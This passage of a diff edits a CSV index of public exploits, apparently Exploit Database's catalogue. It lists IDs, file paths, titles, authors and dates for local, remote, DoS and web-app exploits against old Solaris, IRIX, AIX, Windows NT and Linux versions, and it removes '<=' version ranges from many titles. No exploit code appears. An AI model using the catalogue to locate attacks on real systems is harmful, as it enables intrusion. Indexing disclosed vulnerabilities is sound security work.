Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 -19158,platforms/solaris/local/19158.c,"Sun Solaris <= 2.5.1 PAM & unix_scheme",1997-02-25,"Cristian Schipor",solaris,local,0 -19159,platforms/solaris/local/19159.c,"Solaris <= 2.5.1 ffbconfig",1997-02-10,"Cristian Schipor",solaris,local,0 -19160,platforms/solaris/local/19160.c,"Solaris <= 2.5.1 chkey",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161.txt,"Solaris <= 2.5.1 Ping",1997-06-15,"Adam Caldwell",solaris,local,0 +19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme",1997-02-25,"Cristian Schipor",solaris,local,0 +19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 ffbconfig",1997-02-10,"Cristian Schipor",solaris,local,0 +19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 chkey",1997-05-19,"Adam Morrison",solaris,local,0 +19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 Ping",1997-06-15,"Adam Caldwell",solaris,local,0 19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig",1998-07-20,Loneguard,irix,local,0 19164,platforms/windows/remote/19164.txt,"Microsoft IE4 Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0_WS_FTP Server 1.0.1/1.0.2 Server Privilege Escalation",1999-02-04,Marc,windows,local,0 -19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4_Solaris <= 2.5.1 ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 - xlock (1)",1997-04-26,cesaro,unix,local,0 -19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 -19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 +19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4_Solaris 2.5.1 ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (1)",1997-04-26,cesaro,unix,local,0 +19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 +19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (.m3u/.ppl) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 -19178,platforms/php/webapps/19178.txt,"webo site speedup <= 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 +19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilites",2012-06-16,Vulnerability-Lab,php,webapps,0 19181,platforms/windows/dos/19181.txt,"XnView RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 @@ -16586,52 +16586,52 @@ id,file,description,date,author,platform,type,port 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 -19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0 -19198,platforms/windows/local/19198.txt,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache",1999-02-18,L0pht,windows,local,0 -19199,platforms/solaris/local/19199.c,"Solaris <= 2.5.1 automount",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS <= 2.1_DG/UX <= 4.0_Debian Linux 0.93_Digital UNIX <= 4.0 B_FreeBSD <= 2.1.5_HP-UX <= 10.34_IBM AIX <= 4.1.5_NetBSD 1.0/1.1_NeXTstep <= 4.0_ SGI IRIX <= 6.3_SunOS <= 4.1.4 rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 +19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5_Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0 +19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 Known DLL Cache",1999-02-18,L0pht,windows,local,0 +19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount",1997-11-26,anonymous,solaris,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX 10.34 & IBM AIX 4.2 & SGI IRIX 6.3 & SunOS 4.1.4 - libXt library (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX 10.34 & IBM AIX 4.2 & SGI IRIX 6.3 & SunOS 4.1.4 - libXt library (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX 10.34 & IBM AIX 4.2 & SGI IRIX 6.3 & SunOS 4.1.4 - libXt library (3)",1997-08-25,jGgM,unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1_DG/UX 4.0_Debian Linux 0.93_Digital UNIX 4.0 B_FreeBSD 2.1.5_HP-UX 10.34_IBM AIX 4.1.5_NetBSD 1.0/1.1_NeXTstep 4.0_ SGI IRIX 6.3_SunOS 4.1.4 rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 -19205,platforms/solaris/local/19205.c,"Sun Solaris <= 7.0 dtprintinfo Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 -19206,platforms/solaris/local/19206.c,"Sun Solaris <= 7.0 lpset Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 +19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 +19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 19207,platforms/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service",1999-05-11,"Miquel van Smoorenburg",windows,dos,0 19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha AdSamples",1999-05-11,"Andrey Kruchkov",windows,remote,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0 -19210,platforms/irix/local/19210.txt,"SGI IRIX <= 6.5.4 midikeys Root",1999-05-19,"W. Cashdollar",irix,local,0 +19210,platforms/irix/local/19210.txt,"SGI IRIX 6.5.4 midikeys Root",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow",1999-05-20,"David Litchfield",windows,local,0 19212,platforms/multiple/dos/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,dos,0 -19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 -19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow (2)",1999-05-22,"Georgi Guninski",aix,local,0 -19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0 -19216,platforms/aix/local/19216.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 -19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 +19213,platforms/aix/local/19213.sh,"IBM AIX 4.2.1_ Sun Solaris 7.0 LC_MESSAGES libc Buffer Overflow (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 +19214,platforms/aix/local/19214.c,"IBM AIX 4.2.1_ Sun Solaris 7.0 LC_MESSAGES libc Buffer Overflow (2)",1999-05-22,"Georgi Guninski",aix,local,0 +19215,platforms/aix/local/19215.c,"IBM AIX 4.2.1_ Sun Solaris 7.0 LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0 +19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1_ Sun Solaris 7.0 LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 +19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1_ Sun Solaris 7.0 LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 19219,platforms/linux/remote/19219.c,"BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 -19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0 +19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access",1999-05-25,Marc,multiple,remote,0 19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 Web File Access",1999-05-25,Marc,multiple,remote,0 19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access",1999-05-25,Marc,windows,remote,0 -19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0_Insight Management Agents 4.21 A/4.22 A/4.30 A_Intelligent Cluster Administrator 1.0_Management Agents for Workstations 4.20 A_Server Management Agents <= 4.23_Survey Utility 2.0 Web File Access",1999-05-25,"Master Dogen",multiple,dos,0 +19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0_Insight Management Agents 4.21 A/4.22 A/4.30 A_Intelligent Cluster Administrator 1.0_Management Agents for Workstations 4.20 A_Server Management Agents 4.23_Survey Utility 2.0 Web File Access",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0",1999-05-10,"Thomas Krug",windows,local,0 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,Metasploit,windows,remote,0 -19232,platforms/solaris/local/19232.txt,"SunOS <= 4.1.4 arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 -19233,platforms/solaris/local/19233.txt,"Solaris <= 7.0 aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 -19234,platforms/solaris/local/19234.c,"Solaris <= 7.0 cancel",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235.txt,"Solaris <= 7.0 chkperm",1996-12-05,"Kevin L Prigge",solaris,local,0 -19236,platforms/solaris/remote/19236.txt,"Solaris <= 7.0 Coredump Vulnerbility",1996-08-03,"Jungseok Roh",solaris,remote,0 +19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 +19233,platforms/solaris/local/19233.txt,"Solaris 7.0 aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 +19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel",1999-03-05,"Josh A. Strickland",solaris,local,0 +19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm",1996-12-05,"Kevin L Prigge",solaris,local,0 +19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump",1996-08-03,"Jungseok Roh",solaris,remote,0 19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 SPAM Relay",1999-06-08,Geo,aix,remote,0 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 -19242,platforms/multiple/remote/19242.txt,"CdomainFree <= 2.4 - Remote File Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 +19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote File Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0 @@ -16645,82 +16645,82 @@ id,file,description,date,author,platform,type,port 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 gnuplot",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 -19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3_Debian Linux <= 2.0 netstd Vulnerabilities",1999-01-03,anonymous,linux,local,0 +19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3_Debian Linux 2.0 netstd Vulnerabilities",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 Symlink",1999-03-21,Stealthf0rk,linux,local,0 -19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0 -19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 -19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0 +19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc",1999-02-03,xnec,linux,local,0 +19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2_SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 +19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - (.m3u) Crash PoC",2012-06-18,0dem,windows,dos,0 19266,platforms/windows/remote/19266.py,"Ezhometech Ezserver 6.4 - Stack Overflow Exploit",2012-06-18,modpr0be,windows,remote,0 -19267,platforms/irix/local/19267.c,"SGI IRIX <= 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 +19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269.txt,"SGI IRIX <= 6.0.1 colorview",1995-02-09,"Dave Sill",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port DoS",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0 -19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0 -19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 - eject (1)",1997-05-25,DCRH,irix,local,0 -19277,platforms/irix/local/19277.c,"SGI IRIX <= 6.2 - eject (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 -19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX <= 10.20_IBM AIX <= 4.1.5 connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 +19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df",1997-05-24,"David Hedley",irix,local,0 +19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0 +19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - eject (1)",1997-05-25,DCRH,irix,local,0 +19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - eject (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 +19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX 10.20_IBM AIX 4.1.5 connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console",1996-02-02,"David J Meltzer",linux,local,0 -19280,platforms/irix/local/19280.txt,"SGI IRIX <= 6.2 fsdump",1996-12-03,"Jaechul Choe",irix,local,0 +19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump",1996-12-03,"Jaechul Choe",irix,local,0 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview",1999-05-28,"Chris Evans",linux,local,0 19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos,0 19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow",1997-03-04,Solar,linux,local,0 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow",1998-01-20,satan,linux,local,0 19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1)",1997-05-27,zgv,linux,local,0 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0 -19287,platforms/aix/local/19287.c,"IBM AIX <= 4.3 infod",1998-11-21,"Repent Security Inc",aix,local,0 +19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 -19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 +19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 -19293,platforms/windows/local/19293.py,"Sysax <= 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 +19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299.txt,"SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty",1997-05-06,anonymous,multiple,remote,0 -19300,platforms/aix/local/19300.txt,"IBM AIX <= 4.2.1 snap Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 cgi-bin webdist.cgi",1997-05-06,anonymous,multiple,remote,0 +19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0 -19303,platforms/multiple/remote/19303.txt,"SGI IRIX <= 6.4 cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 -19304,platforms/irix/local/19304.txt,"SGI IRIX <= 6.4 inpview",1997-05-07,"Yuri Volobuev",irix,local,0 +19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 +19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview",1997-05-07,"Yuri Volobuev",irix,local,0 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 -19307,platforms/aix/local/19307.c,"IBM AIX <= 4.2 ping Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow Proof of Concept",1998-01-14,"Aleph One",linux,dos,0 -19309,platforms/aix/local/19309.c,"IBM AIX <= 4.2 lchangelv Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19310,platforms/irix/local/19310.c,"SGI IRIX <= 6.4 login",1997-05-26,"David Hedley",irix,local,0 -19311,platforms/linux/local/19311.c,"RedHat Linux 4.2_SGI IRIX <= 6.3_Solaris <= 2.6 mailx - (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 -19312,platforms/linux/local/19312.c,"RedHat Linux 4.2_SGI IRIX <= 6.3_Solaris <= 2.6 mailx - (2)",1998-06-25,segv,linux,local,0 -19313,platforms/irix/local/19313.txt,"SGI IRIX <= 6.4 netprint",1997-01-04,"Yuri Volobuev",irix,local,0 -19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2_ Slackware Linux <= 3.5 - klogd Buffer Overflow (1)",1999-02-26,"Michal Zalewski",linux,local,0 -19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2_Slackware Linux <= 3.5 klogd Buffer Overflow (2)",1999-02-26,"Esa 